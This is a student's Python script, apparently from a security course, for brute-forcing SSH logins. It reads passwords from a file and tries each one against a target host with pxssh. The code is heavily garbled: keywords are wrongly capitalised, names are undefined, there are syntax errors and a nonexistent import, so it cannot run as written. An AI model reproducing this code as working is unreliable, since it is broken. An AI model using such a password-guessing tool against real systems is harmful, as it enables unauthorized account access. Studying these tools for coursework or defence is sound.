#!/usr/bin/env python3


# Script Name               ops challange 17 p2- 401
# Author                    Dom Moore
# Date                      10/27/20
# Description of purpose    Brute Force tool p2


# Import Libraries

import time
import getpass
import cryptPass
import pxssh
import argparse


# variables 
host = "ip address"
user = "spyguy"
password = "123456"


# menu 
Def usr_menu():
usr_choice = ("""

Choose your mode:
1.password check
2.password validation 
3.ssh login
4.Exit

""")

If(usr_choice == 3):
    Connect()
else:
    exit()



# Fail attempts 
Fail = 0



def connect(host,user,password):

    try:
        s = pxssh.pxssh()
        s.login(host,user,password)
        print(" Sucessful connection ")
        return self

    except Exceptions:
        if Fails > 5:
            print("To many failed attemps")
            exit()

        elif 'read_nonblocking' in str():
            Fails =+ 1
            time.sleep(3)
            return connect(host,user,password)

        elif 'syncronize with original prompt' with str():
            time.sleep(1)
            return connect(host,user,password)
        return None

def Main():
    parser = argparse.ArgumentParser()
    parser.add_argument('host', help="specify target host")
    args = parser.parse_args()


    if args.host:
        with open(args.passwd.txt, 'r') as infile:
            for line in infile:
                password = line.strip('\r\n')
                print('testing: ', = str(password))
                con = connect(args.host,args.user,password)
                if con:
                    print('connection made')

    else:
        exit()

if __name__ '__main__':
    Main()
    
    
    
resourse: https://www.youtube.com/watch?v=aL4uckPsq7g
    
